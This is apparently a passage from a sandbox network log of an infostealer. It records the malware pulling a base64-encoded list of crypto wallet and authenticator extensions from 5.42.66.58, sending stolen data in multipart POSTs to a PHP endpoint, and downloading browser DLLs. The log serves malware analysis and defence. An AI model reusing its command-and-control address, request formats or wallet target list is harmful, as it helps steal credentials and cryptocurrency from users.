73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIF
Dec 27, 2023 17:57:53.836606026 CET	1286	IN	Data Raw: 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e Data Ascii: dhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZ
Dec 27, 2023 17:57:53.836617947 CET	1286	IN	Data Raw: 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 Data Ascii: cmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramV
Dec 27, 2023 17:57:53.836631060 CET	242	IN	Data Raw: 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 Data Ascii: xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hn
Dec 27, 2023 17:57:53.836644888 CET	1286	IN	Data Raw: 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 Data Ascii: Z2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV
Dec 27, 2023 17:57:53.836658955 CET	222	IN	Data Raw: 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 57 48 5a 6c 63 6e 4e 6c 49 46 64 68 62 47 78 6c 64 48 78 70 5a 47 35 75 59 6d 52 77 62 47 31 77 61 48 42 6d 62 47 5a 75 62 47 74 76 62 57 64 77 5a 6d 4a 77 59 32 64 6c 62 47 39 77 5a 33 77 78 66 44 42 38 Data Ascii: xpb2Z8MXwwfDB8WHZlcnNlIFdhbGxldHxpZG5uYmRwbG1waHBmbGZubGtvbWdwZmJwY2dlbG9wZ3wxfDB8MHxVbmlTYXQgV2FsbGV0fHBwYmliZWxwY2ptaGJkaWhha2Zsa2Rjb2NjYmdia3BvfDF8MHwwfFRvbmtlZXBlcnxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHw=
Dec 27, 2023 17:57:54.250725031 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHC Host: 5.42.66.58 Content-Length: 8263 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:57:54.250785112 CET	8263	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 Data Ascii: ------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------AEGHIJEHJDHIDHIDAEHCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 27, 2023 17:57:55.588356972 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:57:56.285893917 CET	89	OUT	GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:57:56.674544096 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:56 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Dec 27, 2023 17:57:56.679291964 CET	1286	IN	Data Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B/81s:<R@B/92P @B
Dec 27, 2023 17:57:56.689348936 CET	1286	IN	Data Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 Data Ascii: ]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Dec 27, 2023 17:57:56.699350119 CET	1286	IN	Data Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
Dec 27, 2023 17:57:59.632922888 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGH Host: 5.42.66.58 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:00.535933018 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:00.878061056 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBF Host: 5.42.66.58 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 17:58:01.769483089 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:01.888659000 CET	552	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD Host: 5.42.66.58 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
Dec 27, 2023 17:58:02.698733091 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:06.099963903 CET	552	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 5.42.66.58 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 34 37 63 30 32 36 37 63 30 37 34 31 38 65 63 63 39 38 30 35 36 62 65 32 63 66 32 30 36 38 36 35 61 66 61 30 39 65 66 37 33 37 61 62 64 62 66 30 35 63 33 36 38 64 62 37 66 63 61 34 63 66 61 34 37 37 64 64 66 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"147c0267c07418ecc98056be2cf206865afa09ef737abdbf05c368db7fca4cfa477ddfcc------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file"------CBKJJEHCBAKFBFHJKFBK--
Dec 27, 2023 17:58:06.591507912 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 17:58:09.265825033 CET	89	OUT	GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 17:58:09.654341936 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:58:09 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 27, 2023 17:58:10.571188927 CET	89	OUT	GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
